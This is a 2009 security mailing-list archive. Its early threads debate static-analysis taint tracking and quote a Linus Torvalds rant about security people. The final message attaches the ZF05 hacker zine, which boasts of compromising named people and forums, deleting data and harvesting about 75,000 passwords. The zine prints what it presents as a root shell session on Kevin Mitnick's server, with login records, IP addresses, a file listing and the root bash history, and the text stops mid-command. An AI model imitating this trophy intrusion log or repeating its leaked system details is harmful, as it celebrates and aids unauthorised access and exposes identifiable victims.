opposed to the > "solve-massive-equation-to-understand-data-constraints" style).[1] > > We were looking at PHP, and I couldn't for the life of me figure out why > the system was alerting on a particular code path. I will reproduce it > here in python, since my PHP is weak. > > d={} //DEFINE dictionary > d["HI"]=TAINTED_USER_DATA; //insert some tainted data to it, whole > dictionary is tainted now. > #stuff goes here that is not relevant (we think) > os.system(d["BYE"]) //ALERT! > > It turns out the analysis tool tainted the whole dictionary if any > tainted data was inserted into it, because all the other solutions for > that are...insanely complex. Maybe one of the static analysis guru's on > the list knows of the best way to solve that particular problem and > wants to share. (Or maybe there isn't a solution for that problem, and > no one wants to point that out either? :>) > > -dave > [1] Scanner Pong's rules are as follows. You must use the test programs > the vendor brings with them to demonstrate their static analysis tool. > For each vulnerability you look at you lose 1 point. For each > vulnerability you look at that you show to be a false positive, you get > 2 points. For each vulnerability you look at where the tool has missed > an interesting vulnerability within 30 lines of code you get 5 points. _______________________________________________ Dailydave mailing list Dailydave at lists.immunitysec.com http://lists.immunitysec.com/mailman/listinfo/dailydave From yersinia.spiros at gmail.com Tue Jul 28 07:44:38 2009 From: yersinia.spiros at gmail.com (yersinia) Date: Tue, 28 Jul 2009 13:44:38 +0200 Subject: [Dailydave] Security people are leaches. [sic] In-Reply-To: <4A6E33B4.30180.252B77B7@pageexec.freemail.hu> References: <4A6E33B4.30180.252B77B7@pageexec.freemail.hu> Message-ID: FWIW, also "insane" http://kerneltrap.org/mailarchive/linux-kernel/2007/10/1/326479/thread#mid-326479 BTW, personally i agreed on the motivations exposed from Linus in the two thread. But is necessary to look in depth on the discussion. Regards On Tue, Jul 28, 2009 at 1:09 AM, wrote: > really. or at least according to one Linus Torvalds, who also happens to be the > primary reason for not one, but two! of this year's pwnie nominations for lamest > vendor response and most epic FAIL. apparently the fundamental issue he cannot > understand is that if they don't know what bugs are security issues, maybe they > should find people who do. or maybe bother reading those static checker reports > that point them out. just a thought. > > also one cannot help but smile at the irony of divineint (put in charge of security > at RH, no less ;) asking for more proper disclosure. how times change ;). > > also i guess exploit writers would heartily disagree with the notion that there's > no difference between bugs and security bugs :P. anyway, without further ado, here's > the latest masterpiece: > > > On Sun, 19 Jul 2009, Eugene Teo wrote: >> >> If the upstream development community can start doing their part by >> differentiating normal bug fixes to the security ones, I think most of >> us will benefit from it. > > Ok, so this is a perfect example of the kind of IDIOTIC blathering that I > hate to hear from security people. > > Quite frankly, people who state things like that ARE FUCKING MORONS. > > I'm sorry, but it's true. Learn it. Think about it. Deeply, and long. > > This who security exploit is a prime example of exactly why anybody who > says something stupid like that is so stupid and so WRONG. > > Look at the bug that caused it. Look at the fix. Think about it. When the > fix was committed, nobody thought it was a security bugfix. > > Really. > > If you cannot understand this FUNDAMENTAL issue, I don't know what can > make you do so. I absolutely despise most security people, because they > are idiots who do not understand development. They are idiots who do not > understand basic facts. They are idiots, who think the world is some kind > of black-and-white place where you can sort bugs into 'security' and 'not > security'. > > So here's a few simple rules: > > - people who argue for full disclosure are wrong > > - people who argue for hiding things and vendor-sec are wrong > > - people who think that there are "bugs" and "security bugs" are > fundamentaly wrong, and misguided, and will always do the wrong thing. > > The fact is, bugs are bugs. We don't know which of them are security > issues. We all make mistakes, and we _fix_ the mistakes, and some of the > fixes turn out to have way more subtle interactions than people even > realized! > > So you can ask developers to "always think of all the possible issues", > and you will be left with developers who won't have time or motivation to > actually do any real work. And they'll _still_ miss some subtle issue, and > they'll _still_ write code that has bugs. > > So how about people face REALITY instead of talking about idiotic > platitudes like people should be "differentiating normal bug fixes to the > security ones"? And it _is_ a platitude: it's something that sounds > "obviously correct", but it's at the same time clearly ignoring the fact > that reality is complicated. > > So f*ck me, shut up about idiotic things like that already! > > This whole bug really is a _prime_ example of how the bugfix was not at > all clearly a security fix at all, even though it obviously was a big > deal. And a security person who cannot understand that is not a security > person at all - he's just a f*cking poser. > > This is why I detest security lists. Lots of posturing and platitudes. And > look at who actually did the real work: a regular developer, and a regular > maintainer, neither of whom were thinking in terms of security. > > Security people are leaches. The real heroes are the people who do > development. The last thing security people should do is to ask the people > who do the REAL WORK to do more. > > Linus > > _______________________________________________ > Dailydave mailing list > Dailydave at lists.immunitysec.com > http://lists.immunitysec.com/mailman/listinfo/dailydave > -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.immunitysec.com/pipermail/dailydave/attachments/20090728/27f5bd8d/attachment.htm From apconole at yahoo.com Tue Jul 28 08:34:13 2009 From: apconole at yahoo.com (Aaron) Date: Tue, 28 Jul 2009 05:34:13 -0700 (PDT) Subject: [Dailydave] Security people are leaches. [sic] In-Reply-To: <4A6E33B4.30180.252B77B7@pageexec.freemail.hu> References: <4A6E33B4.30180.252B77B7@pageexec.freemail.hu> Message-ID: <392650.22524.qm@web65409.mail.ac4.yahoo.com> How can you ever know which bug is a security bug, and which isn't? More importantly, how many bugs do people talk about as theoretically exploitable for some information vs. the ones which are practically exploitable. There may be a better way of classification (for example, when something is an oops/segfault/null dereference and is fixed, then say that) but since linux is Free (as in beer) and Open the onus is on you, the user, to figure out which fixes are pertinent to what you're doing and which are ancillary. Lets say there's a new bug introduced in the kernel. One that presents with the symptom of disclosing a user's password when the kernel is given some invalid argument to printk while processing the shadow file. However, when processing the etc/hosts file, it just discloses the contents of that file. Is that a security bug? You could argue yes; you could argue no. At the end of the day, someone has to do the work to figure out that it either does or doesn't have security implications. Linus' point is: A non-security person fixed it, submitted it to a non-security maintainer, and they committed it. They viewed it as some improper code. To go ahead and research and delve to figure out every path that could ever get impacted and therefore determine that it has security implications goes way beyond the scope of the patch writer and maintainer's jobs. If a security person wants to figure out that something has a security impact, they should. But to put additional burden on a software developer to make your job easier is bull. ________________________________ From: "pageexec at freemail.hu" To: dailydave Sent: Monday, July 27, 2009 7:09:40 PM Subject: [Dailydave] Security people are leaches. [sic] really. or at least according to one Linus Torvalds, who also happens to be the primary reason for not one, but two! of this year's pwnie nominations for lamest vendor response and most epic FAIL. apparently the fundamental issue he cannot understand is that if they don't know what bugs are security issues, maybe they should find people who do. or maybe bother reading those static checker reports that point them out. just a thought. also one cannot help but smile at the irony of divineint (put in charge of security at RH, no less ;) asking for more proper disclosure. how times change ;). also i guess exploit writers would heartily disagree with the notion that there's no difference between bugs and security bugs :P. anyway, without further ado, here's the latest masterpiece: On Sun, 19 Jul 2009, Eugene Teo wrote: > > If the upstream development community can start doing their part by > differentiating normal bug fixes to the security ones, I think most of > us will benefit from it. Ok, so this is a perfect example of the kind of IDIOTIC blathering that I hate to hear from security people. Quite frankly, people who state things like that ARE FUCKING MORONS. I'm sorry, but it's true. Learn it. Think about it. Deeply, and long. This who security exploit is a prime example of exactly why anybody who says something stupid like that is so stupid and so WRONG. Look at the bug that caused it. Look at the fix. Think about it. When the fix was committed, nobody thought it was a security bugfix. Really. If you cannot understand this FUNDAMENTAL issue, I don't know what can make you do so. I absolutely despise most security people, because they are idiots who do not understand development. They are idiots who do not understand basic facts. They are idiots, who think the world is some kind of black-and-white place where you can sort bugs into 'security' and 'not security'. So here's a few simple rules: - people who argue for full disclosure are wrong - people who argue for hiding things and vendor-sec are wrong - people who think that there are "bugs" and "security bugs" are fundamentaly wrong, and misguided, and will always do the wrong thing. The fact is, bugs are bugs. We don't know which of them are security issues. We all make mistakes, and we _fix_ the mistakes, and some of the fixes turn out to have way more subtle interactions than people even realized! So you can ask developers to "always think of all the possible issues", and you will be left with developers who won't have time or motivation to actually do any real work. And they'll _still_ miss some subtle issue, and they'll _still_ write code that has bugs. So how about people face REALITY instead of talking about idiotic platitudes like people should be "differentiating normal bug fixes to the security ones"? And it _is_ a platitude: it's something that sounds "obviously correct", but it's at the same time clearly ignoring the fact that reality is complicated. So f*ck me, shut up about idiotic things like that already! This whole bug really is a _prime_ example of how the bugfix was not at all clearly a security fix at all, even though it obviously was a big deal. And a security person who cannot understand that is not a security person at all - he's just a f*cking poser. This is why I detest security lists. Lots of posturing and platitudes. And look at who actually did the real work: a regular developer, and a regular maintainer, neither of whom were thinking in terms of security. Security people are leaches. The real heroes are the people who do development. The last thing security people should do is to ask the people who do the REAL WORK to do more. Linus _______________________________________________ Dailydave mailing list Dailydave at lists.immunitysec.com http://lists.immunitysec.com/mailman/listinfo/dailydave -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.immunitysec.com/pipermail/dailydave/attachments/20090728/1934f7cc/attachment-0001.htm From rafal at ishackingyou.com Tue Jul 28 10:07:08 2009 From: rafal at ishackingyou.com (Rafal M. Los) Date: Tue, 28 Jul 2009 09:07:08 -0500 Subject: [Dailydave] Static Analysis part 5 In-Reply-To: <4A6E7327.1030805@gmx.de> References: <4A6E0895.7020600@immunityinc.com> <4A6E7327.1030805@gmx.de> Message-ID: Halvar, all... I think it's even more complex than that. The whole problem with static analysis is the impact of the false-positive. We take for granted that Static Analysis generally makes piles of false-positives through analysis (either you're too strict, or too loose... either way is bad) and what that does goes deeper than just make that particular set of results questionable. Infosec generally has a hard enough time convincing developers (this is from experience, not anything else) that they have issues... but then dropping a 300-page report wherein you have thousands of "possible" issues (whether you use a probability scale or not) means that it's going to degrade further the *reputation* that the InfoSec folks have with the rest of the development organization. Vetting false-positives often requires a developer (or at least a compiled app to test with) meaning that there is a much deeper involvement to "get at the truth". Then there's the issue of customer-supplied sanitization and validation routines. Tainted data is one thing but how does a static analysis engine determine that data that passes through Method_X(), for example, doesn't have the right level of sanitization or validation? You simply can't account for all the creative ways that developers can come up with to scrub var's, and it gets worse... Don't get me wrong, I think there is a place for static analysis - but the truth is that there are limited use-cases for the technology. Halvar's examples illustrate a giant gaping hole in static analysis, being able to "be certain" is another huge problem... what you end up with is a report that requires a lot of further analysis, extensive vetting and a (potential) reputational hit to the InfoSec folks... that's a cost/benefit analysis that tips heavily towards the cost. __ Rafal M. Los Security & IT Risk Strategist - Blog: http://preachsecurity.blogspot.com - LinkedIn: http://www.linkedin.com/in/rmlos - Twitter: http://twitter.com/RafalLos -------------------------------------------------- From: "Halvar Flake" Sent: Monday, July 27, 2009 10:40 PM To: "dave" Cc: Subject: Re: [Dailydave] Static Analysis part 5 Tainting / untainting is generally a difficult topic. - If I calculate the length of a tainted string, is the result tainted ? - If I check some boundaries on this string, is the result untainted ? - What if the boundaries I checked for are wrong ? Can of worms, difficult to solve. Cheers, Halvar dave wrote: > If you haven't read it yet (and you like to read things), this is worth > reading: > > http://samate.nist.gov/docs/NIST_Special_Publication_500-279.pdf > > There's a lot of meta-questions here, like "What sorts of > vulnerabilities can automated techniques really find?" Scalability is > hard too. "Can we look at 4500 buffer overflow bugs to triage them?" the > paper asks. > > Many people don't see why it's hard to do static analysis automatically, > which I think is always worth thinking about. > > For example, recently I was at a conference looking at a vendor's > implementation of the traditional "data-flow-then-alert-on-tainted-data" > algorithm. (As opposed to the > "solve-massive-equation-to-understand-data-constraints" style).[1] > > We were looking at PHP, and I couldn't for the life of me figure out why > the system was alerting on a particular code path. I will reproduce it > here in python, since my PHP is weak. > > d={} //DEFINE dictionary > d["HI"]=TAINTED_USER_DATA; //insert some tainted data to it, whole > dictionary is tainted now. > #stuff goes here that is not relevant (we think) > os.system(d["BYE"]) //ALERT! > > It turns out the analysis tool tainted the whole dictionary if any > tainted data was inserted into it, because all the other solutions for > that are...insanely complex. Maybe one of the static analysis guru's on > the list knows of the best way to solve that particular problem and > wants to share. (Or maybe there isn't a solution for that problem, and > no one wants to point that out either? :>) > > -dave > [1] Scanner Pong's rules are as follows. You must use the test programs > the vendor brings with them to demonstrate their static analysis tool. > For each vulnerability you look at you lose 1 point. For each > vulnerability you look at that you show to be a false positive, you get > 2 points. For each vulnerability you look at where the tool has missed > an interesting vulnerability within 30 lines of code you get 5 points. _______________________________________________ Dailydave mailing list Dailydave at lists.immunitysec.com http://lists.immunitysec.com/mailman/listinfo/dailydave _______________________________________________ Dailydave mailing list Dailydave at lists.immunitysec.com http://lists.immunitysec.com/mailman/listinfo/dailydave From dave at immunityinc.com Tue Jul 28 14:21:01 2009 From: dave at immunityinc.com (dave) Date: Tue, 28 Jul 2009 14:21:01 -0400 Subject: [Dailydave] Killbits (I'm not dead yet!) Message-ID: <4A6F418D.9000502@immunityinc.com> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Michael Howard has some of the gritty details of the Killbit bypass here (see Bug #2): http://blogs.msdn.com/sdl/archive/2009/07/28/atl-ms09-035-and-the-sdl.aspx I still don't really understand the vulnerability (do you have to get one ActiveX control instantiated in order to send it the marshalled property map that instantiates the vulnerable object?). But the patches are out, so the information as free as it wanted to be. - -dave -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.9 (GNU/Linux) Comment: Using GnuPG with Fedora - http://enigmail.mozdev.org iEYEARECAAYFAkpvQY0ACgkQtehAhL0ghep0KgCZAYW54dUIZf38qGsrjbeTI6A2 YD0AnjfE+jAcHiLQGDqK+wDS+uWlwP43 =e8Fa -----END PGP SIGNATURE----- From dave at immunityinc.com Tue Jul 28 16:58:24 2009 From: dave at immunityinc.com (dave) Date: Tue, 28 Jul 2009 16:58:24 -0400 Subject: [Dailydave] Also don't read this post! Message-ID: <4A6F6670.4030806@immunityinc.com> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 We had someone come in and interview today, and coincidentally I read this weblog post this morning: http://vrt-sourcefire.blogspot.com/2009/07/dont-read-this-post.html So of course, as the "interview", he got to sit down with Bas and write it up. Our conclusion was that after 8.04, Ubuntu fixed their stack cookie and made it random (or at some point during 8.10?). The Ubuntu security team is on this list, so they can pipe in with when exactly[1], but I guess the point is this: Assuming you're not using a Gentoo which optimizes out the default GCC protections or say, Ubuntu 8.04 (?), which does not implement proper stack cookies last time we checked, is there any real risk from this "awesome" vulnerability? I haven't personally tested CentOS or Fedora or FreeBSD, but I have to assume they have their stack cookie done right. - -dave [1] Also please to be fixing Java Deserialize Bug! -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.9 (GNU/Linux) Comment: Using GnuPG with Fedora - http://enigmail.mozdev.org iEYEARECAAYFAkpvZnAACgkQtehAhL0gherYJwCfai6VhzV4QljK9Lc9DuuMNOJr NusAn3KwG4tTmQO5HbmL6Vs4N8r5LSYl =g7zp -----END PGP SIGNATURE----- From whitehell at rbcmail.ru Tue Jul 28 22:39:03 2009 From: whitehell at rbcmail.ru (Headenson John) Date: Wed, 29 Jul 2009 06:39:03 +0400 Subject: [Dailydave] ZF05 Released In-Reply-To: References: Message-ID: That's ZF0 with a zero. -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.immunitysec.com/pipermail/dailydave/attachments/20090729/157f17e5/attachment-0001.htm -------------- next part -------------- ____ ___ _____ ( _ \ / _ \ ____ ( _ ) | / ( (_) ) _ _ ( ___) | (_) | (_)\_) \___/ ( \/\/ ) _____ )__) (_____) ) ( _ _ ( _ ) (__) (_/\_) ( \( ) | (_) | | \ | ____ (_____) (_)\_) ____ ( _ \ ~ ~ $$$$$ ( ___) | / $$$$ $$$ $$$$$ )__) ____ (_)\_) . ~ $$$$$$ $$$ $$$$$$$ (____) ____ ( ___) . : . $$$ $$$$ $$$ $$$$ $ ( _ \ )__) '. . : . .' $ $$$$ $$$$ $$$ | (_) ) (____) ._ '._.-'''-._.' _. $$$$$$$$$$ $$$$$ (____/ ____ '-..' '..-' $$$$$$$$$$$$ $$$$ $$$$$ ___ (_ ) --._ /. .\ _.-- ~ $$$$$$$$$$$$$$$$$ $$$ | __) / /_ '/ \ $$$ $$$$$$$$$$$$ $ |__ \ (____) -----| `|----- $$ $$$$$$$$$$$$$$$$$ (___/ _: ;_ $$ $$$$ *** $$$ $$$$$ --' \ / '-- $ $$$$ ** $$$$ $$$ _.-''. .''-._ $$$ ** $$$ $$ ' .''-. .-''. ' $$ *** $$$ $ .' ' : ' '. $$ ** $$$ ' : ' $ *** $$ ' $ *** $$ ___ *** $ / __) *** \__ \ `~~^~^~^~^~^~^~^~^~^`~~^~^~^~^~^~^~^~^~^`~~^~^~^~^~^~^~^~***`~~^~^~^~^~^ _ _ (___/ __ __ *** (jgs) ( \/ ) ( )( ) ................. ............ . . . . . .... *** .... ) ( | (__) | ... .. ............ .. . ......... ... . *** . .. . __ (_/\_) (______) __ __ .. ....... . . . ...... . . **** .. . /__\ ( \/ ) .... . ... ... ... . ***** . ... /(__)\ ) ( __ __ .... ******** _ _ (__)(__) (_/\/\_) ( \/ ) ................. ( )_( ) ) ( ____ . . ....... . . ____ ) _ ( (_/\/\_) ( ___) ____ _____ ( ___) (_) (_) )__) ( _ \ ( _ ) )__) (____) | / | (_) | (__) (_)\_) (_____) ~~~~~~~~ 0. Intro ~~~~~~~~ ,- 1. Kevin Mitnick ,'::| 2. 0x000000 /::::| 3. Industry check ,'::::o\ 4. Dan Kaminsky _.. ____........-------rm -rf /* 5. Hacking in gitmo ,-' / _.--"""". . . . . . . . ""`-._ ,-' .;' <. - :::::o...... ... . . .. . . . .""--._ ,-'. .;' 6. darkmindz `-._ ` `":`:`:`::||||:::::::::::::::::.:. . ""--._ ,'| ,-'. .;' 7. Robert Lemos II """_=-- //'{};.. ````:`:`::::::::::.:.:.:. .`-`._-'. .;' 8. Interlude ""--.__ \( \ ` ``:`:``:::: . .;' 9. PerlMonks 13. hak5 "\""--.:-. `. .:/ 10. elitehackers.info 14. CF0 \. / `-._ `.""-----.,-..::(--"".\""`. `:\ 11. Binary Revolution 15. cr0.org `P `-._ \ `-:\ `. `:\ 12. Pwnie Awards 16. Scene check "" " `-._) 17. blackhat-forums 18. Last Words ~~~~~~~~ S y m a n t e c - T h r e a t C o n --------------------------------------------- | Level 31337: Segmentation fault ^ Manipulate threat level to read back the stack and abuse info disclosure | \ / _\/_ Intro .-'-. //o\ _\/_ -- / \ -- | /o\\ ^^~^~^~^~^~^~^~^~~^~^~^~^~^~^~^~^~^~^-=======-~^~~^^~~^~^~^~|~~^~^|^~` | It's July 28th, 2009! Welcome one and all to the real Black Hat Briefings. Live from the underground, coming right at you free of charge. You don't have to pay to come, and you don't get paid to be featured. Presented by real blackhats, this is a must-see event! This is a big one. We hacked notable whitehats Kevin Mitnick, Dan Kaminsky, and Julien Tinnes, among others. We continued the skiddie holocaust with darkmindz, elitehackers, hak5, binrev, and blackhat-forums. Along the way we created mass mayhem. There are more rm's in this zine than you can count on a hand. Just from targets shown here we collected about 75,000 passwords. Passes, not hashes. If you are reading this, then your browser probably did not crash, so you know we couldn't include all of our passwords, let alone hashes. The first version of this was ten times the size of ZF04. > lol yeah I'm gonna have to trim > and by "trim" I mean "remove everything" Let's get warmed up with the first song from the zf05 mix tape, Search & Destroy by classic Iggy Pop. Look for the rest of the songs in the article headers. ~ I'm a street walking cheetah with a hide full of napalm I'm a runaway son of the nuclear A-bomb I am a world's forgotten boy The one who searches and destroys Honey gotta help me please Somebody gotta save my soul Baby detonate for me Look out honey, 'cause I'm using technology Ain't got time to make no apology Soul radiation in the dead of night Love in the middle of a fire fight Honey gotta strike me blind Somebody gotta save my soul Baby penetrate my mind And I'm the world's forgotten boy The one who's searchin', searchin' to destroy And honey I'm the world's forgotten boy The one who's searchin', searchin' to destroy ~ Are you ready? | \ / _\/_ Kevin Mitnick - Freedom Owntime .-'-. //o\ _\/_ -- / \ -- | /o\\ ^^~^~^~^~^~^~^~^~~^~^~^~^~^~^~^~^~^~^-=======-~^~~^^~~^~^~^~|~~^~^|^~` I got a list of demands | written on the palm of my hands Kevin Mitnick, hero to many, wet dream to Emmanuel Goldstein. Consider this a follow up to the cDc article. Kevin has become the media rep for the hacker community, something which he has grown further and further apart from ever since his release. Without John Markoff's sensationalist reporting Kevin Mitnick would not have the notoriety that allows him to earn his money providing keynotes at conferences all over the world. Kevin is polluting the media with bullshit. Whilst we understand that owning him is something which has been done many, many times, we felt that not presenting his insecurity publicly would be wrong. Since 2003 this has been done three times of note and Kevin has used his enormously powerful SOCIAL ENGINEERING techniques to escape with an unharmed repuation each time. The fact is that he cannot secure his systems because he does not know how. Oh before I forget, we were behind the Mitnick mantraining. It was a beautifully executed social engineering experiment that worked flawlessly and also provided us with superb quotes. What can I say, The Art of Deception was some of the most enthralling 352 pages I have ever read. I now present you some of his excellent excuses: "The Web hosting provider that hosts my sites was hacked," Mitnick told CNET News.com in an interview Monday. "Fortunately, I don't keep any confidential data on my Web site, so it wasn't that serious. Of course, it is embarrassing to be defaced--nobody likes it." Defacing Web sites is akin to graffiti in the brick-and-mortar world. "It is kind of stupid; they do it for the attention," Mitnick said. "When I was a hacker, I never stooped to defacing sites because that was more like vandalism; that wasn't any fun. It is more about getting in and being stealth and looking around and exploring." Let me set something straight Kevin, www.kevinmitnick.com is your responsibility to secure. You run a security auditing company - what went wrong? One thing I notice about the above, Kevin referring to himself as a hacker in past tense - heh, at least he doesn't fall for the common fallacy that 'hackers' are not anything other than people who break into systems. "They keep getting compromised," he said. "Maybe I'll move it over to Amazon or something and let them attack Amazon." That'd be great Kev, hopefully you'll shift our doors straight over there. root at www.kevinmitnick.com's password: Last login: Mon Jul 13 17:08:58 2009 from 58.jerveyave.com --------------------------------------------------------------------------- This computer system is for authorized users only. All activity is logged and regularly checked by systems personnel. Individuals using this system without authority or in excess of their authority are subject to having all their services revoked. Any illegal services run by user or attempts to take down this server or it's services will be reported to local law enforcement, and said user will be punished to the full extent of the law. Anyone using this system consents to these terms. --------------------------------------------------------------------------- root at dc21 [~]# w 11:10:22 up 3 days, 12:54, 0 users, load average: 0.00, 0.00, 0.00 USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT root at dc21 [~]# uname -a;id Linux dc21.hostedhere.net 2.6.18-92.1.18.el5.028stab060.2 #1 SMP Tue Jan 13 11:38:36 MSK 2009 i686 i686 i386 GNU/Linux uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel) root at dc21 [~]# last reboot system boot 2.6.18-92.1.18.e Mon Jul 13 22:15 (3+12:37) root pts/0 58.jerveyave.com Mon Jul 13 17:08 - crash (05:07) root pts/0 greenville.isopo Mon Jul 13 05:55 - 13:35 (07:39) reboot system boot 2.6.18-92.1.18.e Mon Jul 13 00:15 (4+10:38) reboot system boot 2.6.18-92.1.18.e Sun Jul 12 23:58 (00:09) root pts/0 greenville.isopo Fri Jul 10 04:50 - 11:59 (07:09) mitsec pts/0 72.19.162.209 Thu Jul 9 09:41 - 10:01 (00:20) root pts/0 58.jerveyave.com Wed Jul 8 21:27 - 21:27 (00:00) root pts/0 58.jerveyave.com Tue Jul 7 20:00 - 08:12 (12:11) reboot system boot 2.6.18-92.1.18.e Tue Jul 7 19:46 (5+03:53) reboot system boot 2.6.18-92.1.18.e Tue Jul 7 17:07 (00:13) reboot system boot 2.6.18-92.1.18.e Tue Jul 7 10:59 (05:36) root pts/0 greenville.isopo Tue Jul 7 05:33 - down (05:17) root pts/0 5ace2de4.bb.sky. Tue Jul 7 05:31 - 05:32 (00:01) reboot system boot 2.6.18-92.1.18.e Tue Jul 7 02:53 (07:57) mitsec pts/0 ip68-229-7-88.lv Thu Jul 2 00:17 - 02:30 (02:13) mitsec pts/0 ip68-229-7-88.lv Wed Jul 1 00:41 - 01:31 (00:50) root pts/3 tech1.xyzdns.net Tue Jun 30 09:33 - 10:01 (00:27) root pts/2 tech1.xyzdns.net Tue Jun 30 09:32 - 10:01 (00:28) root pts/1 tech1.xyzdns.net Tue Jun 30 09:30 - 10:01 (00:30) root pts/0 58.jerveyave.com Mon Jun 29 15:16 - 16:36 (1+01:19) mitsec pts/1 93.sub-75-212-18 Mon Jun 29 12:40 - 14:57 (02:16) root pts/0 58.jerveyave.com Mon Jun 29 05:30 - 15:14 (09:43) mitsec pts/0 110.sub-75-212-1 Mon Jun 29 04:35 - 04:37 (00:02) mitsec pts/1 nmd.sbx03424.las Mon Jun 29 01:47 - 02:14 (00:26) mitsec pts/1 nmd.sbx03424.las Mon Jun 29 01:19 - 01:25 (00:06) mitsec pts/0 c-67-169-204-62. Mon Jun 29 01:19 - 02:46 (01:27) mitsec pts/1 c-67-169-204-62. Mon Jun 29 01:14 - 01:18 (00:04) mitsec pts/0 nmd.sbx03424.las Mon Jun 29 01:08 - 01:15 (00:06) mitsec pts/0 nmd.sbx03424.las Mon Jun 29 00:11 - 00:32 (00:20) root pts/1 tech1.xyzdns.net Tue Jun 23 05:31 - 06:50 (01:18) root pts/1 tech1.xyzdns.net Tue Jun 23 05:28 - 05:30 (00:01) root pts/0 tech1.xyzdns.net Mon Jun 22 17:54 - 16:17 (22:23) mitsec pts/1 nmd.sbx03424.las Sat Jun 20 02:57 - 03:37 (00:40) mitsec pts/1 ip68-229-7-88.lv Fri Jun 19 22:02 - 22:05 (00:03) mitsec pts/1 ip68-229-7-88.lv Fri Jun 19 20:44 - 21:28 (00:44) root pts/0 58.jerveyave.com Thu Jun 18 20:26 - 09:37 (1+13:11) mitsec pts/0 ip68-229-7-88.lv Thu Jun 18 11:09 - 11:40 (00:31) mitsec pts/0 ip68-229-7-88.lv Wed Jun 17 09:53 - 09:53 (00:00) mitsec pts/0 pool-71-106-244- Mon Jun 15 03:08 - 03:10 (00:02) mitsec pts/0 pool-71-106-244- Tue Jun 9 15:44 - 16:10 (00:25) root pts/0 greenville.isopo Tue Jun 9 12:14 - 14:02 (01:47) reboot system boot 2.6.18-92.1.18.e Mon May 18 15:12 (49+05:01) mitsec pts/0 ip72-193-114-177 Fri May 15 01:44 - 01:59 (00:14) root pts/0 greenville.isopo Fri Apr 24 06:58 - 11:09 (04:11) reboot system boot 2.6.18-92.1.18.e Thu Apr 23 20:26 (73+23:47) mitsec pts/1 186.81.109.196 Mon Apr 20 11:00 - 15:50 (04:50) root pts/1 tech1.xyzdns.net Sun Apr 19 11:39 - 14:16 (02:36) root pts/0 58.jerveyave.com Sun Apr 19 09:01 - 18:36 (4+09:34) reboot system boot 2.6.18-92.1.18.e Sun Apr 19 06:55 (4+11:41) reboot system boot 2.6.18-92.1.18.e Sun Apr 19 06:46 (00:04) root pts/1 tech1.xyzdns.net Sat Apr 18 14:07 - 14:35 (00:28) root pts/0 tech1.xyzdns.net Sat Apr 18 08:18 - 01:28 (17:10) reboot system boot 2.6.18-92.1.18.e Sat Apr 18 07:15 (23:30) reboot system boot 2.6.18-92.1.18.e Fri Apr 17 03:51 (1+03:24) root pts/1 58.jerveyave.com Fri Mar 27 18:21 - 21:42 (5+03:20) mitsec pts/2 wsip-70-168-126- Wed Mar 25 21:34 - 23:46 (02:12) root pts/1 58.jerveyave.com Wed Mar 25 20:03 - 03:45 (1+07:41) root pts/4 tech1.xyzdns.net Tue Mar 24 11:09 - 13:21 (02:12) root pts/3 greenville.isopo Tue Mar 24 11:05 - 14:32 (03:27) root pts/2 tech1.xyzdns.net Mon Mar 23 01:22 - 13:59 (1+12:37) root pts/2 tech1.xyzdns.net Sat Mar 21 15:49 - 17:09 (01:19) root pts/1 66-191-205-150.d Sat Mar 21 15:26 - 20:03 (4+04:36) root pts/0 tech3.xyzdns.net Sat Mar 21 14:08 - 16:40 (02:32) root pts/0 66-191-205-150.d Sat Mar 21 08:54 - 13:08 (04:13) reboot system boot 2.6.18-92.1.18.e Sat Mar 21 08:43 (26+19:06) reboot system boot 2.6.9-023stab040 Sat May 26 10:33 (00:22) wtmp begins Sat May 26 10:33:49 2007 root at dc21 [~]# cd /root root at dc21 [~]# ls -la total 92 drwxr-xr-x 12 root root 4096 Jul 17 10:51 . drwxr-xr-x 22 root root 4096 Jul 13 22:16 .. drwxr-xr-x 7 root root 4096 Mar 21 10:30 .MirrorSearch -rwxr-xr-x 1 root root 4659 Jul 13 13:35 .bash_history -rwxr-xr-x 1 root root 24 Jan 6 2007 .bash_logout -rwxr-xr-x 1 root root 191 Jan 6 2007 .bash_profile -rwxr-xr-x 1 root root 413 Mar 21 14:09 .bashrc drwxr-xr-x 4 root root 4096 Mar 21 10:37 .cpanel drwxr-xr-x 4 root root 4096 Mar 21 09:26 .cpobjcache -rwxr-xr-x 1 root root 100 Jan 6 2007 .cshrc drwxr-xr-x 2 root root 4096 Mar 21 09:28 .gnupg -rw------- 1 root root 46 Jul 6 19:27 .my.cnf -rwxr-xr-x 1 root root 264 Jul 15 00:27 .pearrc -rwxr-xr-x 1 root root 1024 Mar 21 10:37 .rnd drwxr-xr-x 3 root root 4096 Mar 21 10:36 .spamassassin -rwxr-xr-x 1 root root 129 Jan 6 2007 .tcshrc drwxr-xr-x 4 root root 4096 Mar 21 14:21 cpanel3-skel drwxr-xr-x 2 root root 4096 Mar 21 10:22 public_ftp drwxr-xr-x 3 root root 4096 Mar 21 10:22 public_html -rwxr-xr-x 1 root root 2171 Dec 12 2008 pure-ftpd drwxr-xr-x 2 root root 4096 Mar 21 14:09 security drwxr-xr-x 3 root root 4096 Mar 21 15:51 tmp root at dc21 [~]# cat .bash_history passwd w w. w cd /home wget http://layer1.cpanel.net/latest sh latest /scripts/upcp w cd / ls mv hypervm-scheduled-2.0-vps9.vm-2009-Mar-21-1237645742.tgz 3-21-mitsec-os-image.tgz ls -l ls cd home ls wget http://dc21.hostedhere.net/mitsec.tar.gzw w ls cd /home/ ls /scripts/restorepkg mitsec.tar.gz mkdir /root/security;cd /root/security wget http://72.3.144.149/software/psm.tar;tar -xvf psm.tar;rm -f psm.tar;./psm 1;rm -f psm.txt;rm -f psm ls -l chkrootkit /usr/local/bin/rkhunter --update rkhunter -sk -c /sbin/service apf restart /sbin/ifconfig vi /etc/apf/conf.apf /sbin/service apf restart cd /root /scripts/fixdc /scripts/fixndc vi /etc/cpupdate.conf vi /etc/hosts cd /scripts/ ./restartsrv named ./restartsrv http ./upcp --force ./fixcommonproblems ./reinstallmailman cd /root hostname -i vi /usr/local/sim/conf.sim cp -p /etc/ssh/sshd_config /etc/ssh/sshd_config.357 vi 